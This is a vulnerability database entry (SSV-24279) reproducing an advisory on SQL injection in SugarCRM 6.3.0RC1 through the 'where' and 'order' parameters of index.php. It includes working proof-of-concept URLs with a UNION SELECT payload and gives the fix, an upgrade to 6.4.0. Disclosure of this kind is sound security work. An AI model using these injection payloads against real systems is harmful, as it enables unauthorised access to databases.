SugarCRM 6.3.0RC1 SQL Injection Vulnerability

基本字段

漏洞编号:
SSV-24279
披露/发现时间:
未知
提交时间:
2011-12-01
漏洞等级:
漏洞类别:
SQL 注入
影响组件:
SugarCRM
漏洞作者:
未知
提交者:
Knownsec
CVE-ID:
补充
CNNVD-ID:
补充
CNVD-ID:
补充
ZoomEye Dork:
补充

来源

漏洞详情

暂无漏洞详情

PoC (非 pocsuite 插件)

贡献者 Knownsec 共获得   0.1KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
Vulnerable Version: Community Edition 6.3.0RC1 and probably prior
Tested Version: Community Edition 6.3.0RC1
Vendor Notification: 05 October 2011
Vulnerability Type: SQL Injection
Status: Fixed by Vendor
Risk level: Medium
Credit: High-Tech Bridge SA Security Research Lab ( https://www.htbridge.ch/advisory/ )
Reference: https://www.htbridge.ch/advisory/sql_injection_in_sugarcrm.html
Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered vulnerability in SugarCRM, which can be exploited to perform sql injection attacks.
Input passed via the "where" and "order" GET parameters to index.php is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The following PoC code is available:
http://[host]/index.php?entryPoint=json&action=get_full_list&module=Leads&where=0%29%20union%20select%20version%28%29,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71%20--%20
http://[host]/index.php?entryPoint=json&action=get_full_list&module=Leads&order=SQL_CODE_HERE%20--%20
Successful exploitation of the vulnerabilities requires attacker to be registered and logged-in.
Solution: Upgrade to the version 6.4.0
Disclaimer: Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on the web page in Reference field.
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

共 3 兑换

参考链接

解决方案

临时解决方案

官方解决方案

升级到最新无漏洞版本

防护方案

人气 1354
评论前需绑定手机 现在绑定

暂无评论

※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负